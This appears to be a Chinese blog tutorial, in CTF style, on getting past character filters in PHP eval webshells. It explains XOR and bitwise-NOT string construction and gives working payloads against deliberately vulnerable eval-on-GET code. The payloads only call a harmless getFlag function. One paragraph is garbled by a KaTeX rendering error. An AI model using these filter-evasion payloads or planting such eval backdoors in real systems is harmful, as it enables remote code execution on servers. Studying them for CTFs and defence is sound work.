当前位置: 首页 > news >正文

webshell绕过

文章目录

  • webshell
    • 前置知识
    • 进阶绕过

webshell

前置知识

<?phpecho "A"^"`";
?>

运行结果
在这里插入图片描述

可以看到出来的结果是字符“!”。

为什么会得到这个结果?是因为代码的“A”字符与“`”字符产生了异或。

php中,两个变量再进行异或的时候,它会将字符串转换成ASCII码,然后将ASCII码转换成二进制再来进行异或操作,异或完,又将二进制的结果转换成ASCII码,再将ASCLL码转换成字符串。

那么什么是异或?

异或操作就是两个二进制数在一起对比时,相同的为0,不同的为1

比如

A的ASCII码是65,对应的二进制是0100 0001

`的ASCII码是96,对应的二进制是0110 0000

那么,异或后,就是0010 0001,对应的ASCII码是33,对应的字符串就是!

接下来,看另外一个代码

<?phpfunction B(){echo "Hello Angel_Kitty";}$_++;$__= "?" ^ "}";$__();
?>

这个代码的运行结果为:Hello Angel_Kitty
在这里插入图片描述

分析一下代码

$_++;就是将"_"这个变量进行自增的操作,在PHP中,通常未定义的变量默认值为null,而nullfalse0,所以,我们可以通过这样的方法来得到一个数字。

$__="?" ^ "}";对字符"?""}"进行了异或运算,将得到的结果B赋给变量名为"__"(两个下划线)的变量

$ __ ();通过上面的赋值操作,变量$__的值就变成了B,所以这一行代码可以被看作B(),相当于调用函数B。所以运行后的结果是Hello Angel_Kitty。

我们可以通过这样转换的方法来绕过那些会检测我们的代码。

像是_POST",“system”,"call_user_func_arry"这些我们需要的字符串能够进行转换,或是其他的一些我们需要的东西。

下面是一个简单的PHP后门:

<?php
include 'flag.php';
if(isset($_GET['code'])){$code = $_GET['code'];if(strlen($code)>40){die("Long.");}if(preg_match("/[A-Za-z0-9]+/",$code)){die("NO.");}@eval($code);
}else{highlight_file(__FILE__);
}
//$hint =  "php function getFlag() to get flag";
?>
// flag.php
<?phpfunction getFlag(){echo "hello world";}
?>

payload

?code=$_="`{{{"^"?<>/";${$_}[_]();&_=getFlag

运行后的结果
在这里插入图片描述

<?phpecho "`{{{"^"?<>/";//_GET
?>

首先,这个的运行结果是
在这里插入图片描述

那么前面的KaTeX parse error: Expected '}', got 'EOF' at end of input: … 中,然后前面又加了个字符,就变成了 $ _GET,又因为& _=getFlag,那么$ _GET又赋值了一个getFlag,所以就变成了调用getFlag函数。

第二种解法:

?code=$_=~%98%9A%8B%B9%93%9E%98;$_();

也是一样的效果
在这里插入图片描述

进阶绕过

<?php include'flag.php'; if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>50){ die("Too Long."); } if(preg_match("/[A-Za-z0-9_]+/",$code)){ die("Not Allowed."); } @eval($code); 
}else{ highlight_file(__FILE__); 
} 
//$hint = "php function getFlag() to get flag"; 
?>

因为这个代码把_过滤了,所以我们需要用异或的方式

echo ("@" ^ "'").("@" ^ "%").("^" ^ "*").("|" ^ ":").("@" ^ ",").("@" ^ "!").("@" ^ "'");echo "@@^|@@@" ^ "'%*:,!'";

在这里插入图片描述

可以看到,我们这两行代码在进行异或操作过后,都是getFlag

所以最终的payload是

?code=$啊="@@^|@@@"^"'%*:,!'";$啊();

因为前面的代码中过滤了字母、数字和下划线,所以这边采用一下汉字来作为变量名。

然后,运行结果也是同样的hello world
在这里插入图片描述

http://www.lryc.cn/news/130951.html

相关文章:

  • Spring Boot 统一功能处理
  • 图像处理常见的两种拉流方式
  • 数据可视化数据调用浅析
  • 恒运资本:CPO概念发力走高,兆龙互联涨超10%,华是科技再创新高
  • 【蓝桥杯】[递归]母牛的故事
  • 使用RDP可视化远程桌面连接Linux系统
  • 数据可视化diff工具jsondiffpatch使用学习
  • pdf 转 word
  • 【数据结构OJ题】设计循环队列
  • Java 中创建对象有哪些方式?
  • Kafka 消息发送和消费流程
  • UVa10048 Audiophobia(floyd)
  • ​Redis概述
  • MsrayPlus多功能搜索引擎采集软件
  • 机器学习之概率论
  • 【深度学习 | 数据可视化】 视觉展示分类边界: Perceptron模型可视化iris数据集的决策边界
  • 【计算机视觉】相机基本知识(还在更新)
  • C++ (友元)(类嵌套时,成员函数以及类声明定义的顺序)小demo
  • 前端实习第五周周记
  • 【图论】Floyd算法
  • ceph数据分布
  • mysql的两张表left join 进行关联后,索引进行优化案例
  • 2018年3月全国计算机等级考试真题(语言二级C)
  • java.util.Timer简介以及简单使用示例
  • C语言笔试训练【第12天】
  • 外网连接局域网的几种方式?快解析内网穿透安全便利吗?
  • 基于互斥锁的生产者消费者模型
  • USB隔离器电路分析,SA8338矽塔sytatek电机驱动,源特科技VPS8701,开关电源,电源 大师
  • TPC-DS 测试是否支持 Glue Data Catalog?
  • 网络编程(8.14)TCP并发服务器模型